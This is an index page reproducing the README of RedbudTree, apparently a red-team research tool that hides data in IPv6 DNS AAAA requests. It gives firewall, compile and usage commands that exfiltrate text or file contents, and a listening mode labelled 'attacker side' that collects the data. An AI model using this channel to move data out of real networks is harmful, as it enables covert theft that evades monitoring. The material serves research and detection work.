An open API service indexing awesome lists of open source software.

https://github.com/damonmohammadbagher/redbudtree

DNS IPv6 Request Listener (UDP Port 53) for Detecting Exfiltration DATA via IPv6 DNS AAAA Record Requests
https://github.com/damonmohammadbagher/redbudtree

Last synced: 5 months ago
JSON representation

DNS IPv6 Request Listener (UDP Port 53) for Detecting Exfiltration DATA via IPv6 DNS AAAA Record Requests

Awesome Lists containing this project

README

          

# RedbudTree
![](https://github.com/DamonMohammadbagher/RedbudTree/blob/master/Pic.jpg)
DNS IPv6 Request Listener (UDP Port 53) for Detecting Exfiltration DATA via IPv6 DNS AAAA Record Requests.

Video (step by step) : https://www.youtube.com/watch?v=9jiry5b-oPo

bsdmag.org PDF Download , PDF File BSD-Magazine issue (2/2018)

For Read Full Article Please visit this link (Download - Free) : https://bsdmag.org/download/table-level-security-postgresql/

Github PDF Download , PDF File BSD-Magazine issue (2/2018)

For Read Full Article Please visit this link (Download - Free) : https://github.com/DamonMohammadbagher/Exfiltration-and-Uploading-DATA-by-DNS-Traffic-AAAA-Records-

step 1:
/// for using "Listening Mode" UDP Port 53 should be opened before using this tool.
/// windows command for opening UDP port 53 is :
/// netsh advfirewall firewall add rule name="UDP 53" dir=in action=allow protocol=UDP localport=53

Note: step "1" is for attacker side

step 2:
/// Compiling C# Code.
/// windows command for this is :
/// csc.exe /out:RedbudTree.exe RedbudTree.cs

step 3:
/// RedbudTree.exe Help
/// windows command for this is :

/// Syntax 1: Creating Exfiltration DATA via IPv6 Address and Nslookup.
/// Syntax 1: RedbudTree.exe "AAAA" "Text"
/// Example1: RedbudTree.exe AAAA "this is my test"

/// Syntax 2: Creating Exfiltration DATA via IPv6 Address and Nslookup by Text Files. (redbudtree_2.png)
/// Syntax 2: RedbudTree.exe "AAAA" "FILE" "TextFile.txt"
/// Example2: RedbudTree.exe AAAA FILE "TextFile.txt"

/// Syntax 3: RedbudTree with Listening Mode
/// Syntax 3: RedbudTree.exe
Note: syntax 3 is ((Dumping DATA via IPv6 Requests , attacker side)) (redbudtree_3.png)